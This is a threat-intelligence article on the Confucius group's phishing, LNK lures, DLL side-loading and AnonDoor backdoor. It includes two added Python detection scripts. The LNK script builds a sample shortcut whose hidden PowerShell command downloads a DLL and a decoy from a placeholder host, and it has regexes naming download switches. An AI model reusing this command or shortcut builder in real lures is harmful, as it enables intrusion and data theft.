The Confucius hacking group, a long-running cyber-espionage operation with suspected state-sponsored ties, has significantly reworked its tooling over the past year, moving from file stealers such as WooperStealer to a Python-based backdoor, AnonDoor.
The December 2024 campaign showed the group's refined social engineering: phishing emails carried a weaponized PowerPoint show (Document.ppsx) that displayed a “Corrupted Page” message to the victim.
The document contained embedded OLE objects that fetched and ran VBScript from remote infrastructure at greenxeonsr.info, starting a multi-stage infection chain.
Recent analysis by FortiGuard Labs reveals how this South Asian threat actor has weaponized Office documents and malicious LNK files to compromise Windows systems across the region, particularly targeting Pakistan-based organizations.
The infection chain relies on DLL side-loading: the malware copies the legitimate, signed Windows executable fixmapi.exe into a user directory under the name Swom.exe, so that the trusted binary loads an attacker-supplied DLL placed beside it rather than the genuine one.
Persistence is set through the Load value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, a rarely used legacy autostart entry that runs the referenced program each time the user logs on.
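As an added example (this is not code from FortiGuard Labs or from the article), the following Python script hunts for the two artifacts just described: a byte-identical copy of a System32 side-loading host sitting under a user profile, whatever it has been renamed to, with the matching DLL dropped beside it, and a populated Load value under HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows. The fixmapi.exe/Mapistub.dll pairing and the Swom.exe name come from the report; the fixture directory, the file contents and the Load value string in the demo are constructed placeholders, and the registry read only works on Windows.

```python
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Set, Tuple

# Side-loading host -> DLL it loads. fixmapi.exe/Mapistub.dll is the pairing described
# in the report; any other pairs would have to be added here (assumption: none listed).
SIDELOAD_HOSTS: Dict[str, str] = {"fixmapi.exe": "mapistub.dll"}
LOAD_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"  # holds the "Load" value


def sha256_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def index_system_binaries(system_dir: Path) -> Tuple[Dict[str, str], Set[int]]:
    """Hash the genuine copies in System32; the size set lets the walk skip most files unhashed."""
    hashes, sizes = {}, set()
    for name in SIDELOAD_HOSTS:
        p = system_dir / name
        if p.is_file():
            hashes[sha256_file(p)] = name
            sizes.add(p.stat().st_size)
    return hashes, sizes


def find_sideload_copies(hashes: Dict[str, str], sizes: Set[int], user_roots: List[Path]) -> List[dict]:
    """Walk user-writable trees and report files whose content is a known side-loading host,
    whatever they are named, noting whether the DLL it would load sits in the same directory."""
    hits = []
    for root in user_roots:
        for dirpath, _, filenames in os.walk(root):
            lower_names = {f.lower() for f in filenames}
            for fn in filenames:
                p = Path(dirpath) / fn
                try:
                    if p.stat().st_size not in sizes:
                        continue
                    original = hashes.get(sha256_file(p))
                except OSError:
                    continue
                if original is None:
                    continue
                hits.append({
                    "path": str(p),
                    "original": original,
                    "renamed": fn.lower() != original,                         # e.g. Swom.exe
                    "companion_dll": SIDELOAD_HOSTS[original] in lower_names,  # e.g. Mapistub.dll
                })
    return hits


def read_load_value() -> Optional[str]:
    """Return HKCU\\...\\Windows\\Load, or None when unset or when not running on Windows."""
    try:
        import winreg
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, LOAD_KEY) as key:
            return winreg.QueryValueEx(key, "Load")[0]
    except OSError:
        return None


def assess_load_value(value: Optional[str]) -> List[str]:
    """Load is almost never set on a clean system; a user-writable path makes it a strong signal."""
    if not value:
        return []
    findings = [f"Load value set: {value}"]
    low = value.lower()
    if any(m in low for m in ("\\users\\", "\\appdata\\", "\\temp\\", "%appdata%", "%temp%", "%userprofile%")):
        findings.append("Load points into a user-writable directory")
    return findings


def demo() -> dict:
    """Constructed fixture: a fake System32 holding fixmapi.exe and a user profile holding the
    renamed copy plus the side-loaded DLL. File contents are placeholders, not real PE files."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        sys32, roaming = root / "Windows" / "System32", root / "Users" / "alice" / "AppData" / "Roaming"
        sys32.mkdir(parents=True)
        roaming.mkdir(parents=True)
        fake_pe = b"MZ-placeholder-for-fixmapi.exe"
        (sys32 / "fixmapi.exe").write_bytes(fake_pe)
        (roaming / "Swom.exe").write_bytes(fake_pe)            # renamed copy of the signed host
        (roaming / "Mapistub.dll").write_bytes(b"MZ-placeholder-malicious-dll")
        (roaming / "notes.txt").write_bytes(b"benign")
        hashes, sizes = index_system_binaries(sys32)
        hits = find_sideload_copies(hashes, sizes, [root / "Users"])
        load = assess_load_value(r"C:\Users\alice\AppData\Roaming\Swom.exe")  # constructed value
    return {"hits": hits, "load_findings": load}


if __name__ == "__main__":
    print(demo())
    print(assess_load_value(read_load_value()))
```

On a live host, point index_system_binaries at C:\Windows\System32 and find_sideload_copies at C:\Users; matching by content rather than by name is what catches the rename, and a hit with companion_dll set is the side-loading pair in place. Extend SIDELOAD_HOSTS only with binaries you have confirmed load a DLL by name from their own directory.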
Evolution to LNK-Based Attacks
By March 2025, Confucius had pivoted to malicious LNK files disguised as legitimate documents like “Invoice_Jan25.pdf.lnk.”

These files execute PowerShell commands that download malicious DLLs and decoy PDF documents from remote servers, maintaining the illusion of legitimate file access while establishing backdoor access.
The downloaded Mapistub.dll creates additional persistence mechanisms and prepares Base64-encoded remote host addresses for payload delivery.
Analysis showed the final payload was still WooperStealer, configured to exfiltrate a wide range of file types, including documents, images, archives and mail data, with extensions ranging from .txt and .pdf to .pst and .eml.
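The LNK lure described above can be triaged without opening it, because the PowerShell command line lives in the shortcut's StringData. As an added example (not code from FortiGuard Labs or from the article), the Python below parses the MS-SHLLINK header and StringData, then applies the heuristics a reviewer would apply to Invoice_Jan25.pdf.lnk: a document extension in front of .lnk, a script host as the target, download and hidden-window switches in the arguments, and an icon borrowed from a document viewer. The sample shortcut is constructed inline by build_lnk; its URLs, paths and the Acrobat icon are placeholders, not indicators from the report, and only the file name and the decoy-plus-Mapistub.dll pattern follow the page.

```python
import re
import struct
from typing import Dict, List

# MS-SHLLINK fixed header: size 0x4C, CLSID 00021401-0000-0000-C000-000000000046 (little-endian)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
FLAG_HAS_IDLIST, FLAG_HAS_LINKINFO, FLAG_IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections appear in this fixed order, each present only if its LinkFlags bit is set
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08), ("working_dir", 0x10),
                 ("arguments", 0x20), ("icon_location", 0x40)]
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt", ".jpg", ".png")
SCRIPT_HOSTS = re.compile(r"(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)\.exe$")
SUSPICIOUS_ARGS = re.compile(
    r"(?i)\b(?:iwr|invoke-webrequest|iex|invoke-expression|start-process|downloadfile|downloadstring)\b"
    r"|-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")


def parse_lnk(data: bytes) -> Dict[str, str]:
    """Return the StringData fields (relative target path, working dir, arguments, icon) of a .lnk."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & FLAG_HAS_IDLIST:          # skip IDListSize + the shell item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & FLAG_HAS_LINKINFO:        # skip LinkInfo; its size field includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & FLAG_IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def assess_lnk(filename: str, fields: Dict[str, str]) -> List[str]:
    """Heuristics for a shortcut posing as a document; returns human-readable findings."""
    findings = []
    low = filename.lower()
    if low.endswith(".lnk") and low[:-4].endswith(DOC_EXTENSIONS):
        findings.append("double extension disguises a shortcut as a document: " + filename)
    target = fields.get("relative_path", "").lower()
    if SCRIPT_HOSTS.search(target):
        findings.append("target is a script host: " + target.rsplit("\\", 1)[-1])
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_ARGS.finditer(fields.get("arguments", ""))})
    if hits:
        findings.append("suspicious arguments: " + ", ".join(hits))
    icon = fields.get("icon_location", "").lower()
    if any(viewer in icon for viewer in ("acro", "winword", "excel", "powerpnt")):
        findings.append("icon borrowed from a document viewer: " + fields["icon_location"])
    return findings


def build_lnk(fields: Dict[str, str], show_command: int = 7) -> bytes:
    """Build a minimal Unicode .lnk (header + StringData only); used here to construct the sample."""
    flags, body = FLAG_IS_UNICODE, b""
    for name, bit in STRING_FIELDS:
        if name in fields:
            flags |= bit
            body += struct.pack("<H", len(fields[name])) + fields[name].encode("utf-16-le")
    hdr = bytearray(LNK_HEADER_SIZE)
    struct.pack_into("<I", hdr, 0, LNK_HEADER_SIZE)
    hdr[4:20] = LNK_CLSID
    struct.pack_into("<I", hdr, 0x14, flags)
    struct.pack_into("<I", hdr, 0x3C, show_command)   # 7 = SW_SHOWMINNOACTIVE keeps the console window out of sight
    return bytes(hdr) + body + struct.pack("<I", 0)   # zero-length block terminates ExtraData


# Constructed sample modelled on the lure: placeholder URLs and paths, not indicators from the report
SAMPLE_LNK = build_lnk({
    "relative_path": r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "working_dir": r"C:\Windows\System32",
    "arguments": '-w hidden -ep bypass -c "iwr http://example.invalid/decoy.pdf -OutFile $env:TEMP\\Invoice_Jan25.pdf; '
                 'iwr http://example.invalid/Mapistub.dll -OutFile $env:TEMP\\Mapistub.dll; Start-Process $env:TEMP\\Invoice_Jan25.pdf"',
    "icon_location": r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
})

if __name__ == "__main__":
    for finding in assess_lnk("Invoice_Jan25.pdf.lnk", parse_lnk(SAMPLE_LNK)):
        print(finding)
```

The parser deliberately skips the LinkTargetIDList and LinkInfo structures, so for a shortcut whose target is recorded only there the relative_path check will not fire; the arguments and icon checks still work because StringData follows those structures at a computable offset.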
The most significant evolution occurred in August 2025 with the introduction of AnonDoor, a sophisticated Python-based backdoor that represents a marked departure from previous .NET-based tools.

AnonDoor installs its own runtime by downloading and configuring Python through the Scoop package manager, and stores its compiled code as hidden .pyc files in user directories.
AnonDoor implements advanced reconnaissance capabilities, fingerprinting victim systems through multiple techniques including WMIC hardware UUID extraction, public IP geolocation via services like api.ipify.org and ip-api.com, and comprehensive disk space enumeration across all drive letters.
Command and Control Operations
The backdoor supports extensive command execution capabilities including screenshot capture, file listing and download, directory traversal, and credential harvesting from browsers like Firefox and Edge.
AnonDoor exchanges structured messages with its command-and-control server, using fixed delimiters ($!!$ and #$$) to separate fields, and polls the server only every six minutes, a low cadence that keeps its network and process activity sparse and harder to spot.
Organizations utilizing FortiGate, FortiMail, FortiClient, and FortiEDR solutions receive automatic protection against these evolving attack vectors.
The malware’s modular architecture allows dynamic loading of additional Python modules from remote servers, enabling operators to expand functionality based on specific intelligence requirements.

Geographic targeting remains focused on South Asian regions, particularly Pakistan, consistent with Confucius’ historical operational patterns.
FortiGuard Labs has added detections for the campaign; FortiGuard Antivirus flags its components under signature names such as LNK/Agent, MSOffice/Agent and Python/Agent.
The Confucius group’s tactical evolution demonstrates the persistent adaptation of state-aligned threat actors, emphasizing the critical importance of multi-layered security approaches and continuous threat intelligence monitoring in defending against sophisticated espionage operations targeting regional government and defense organizations.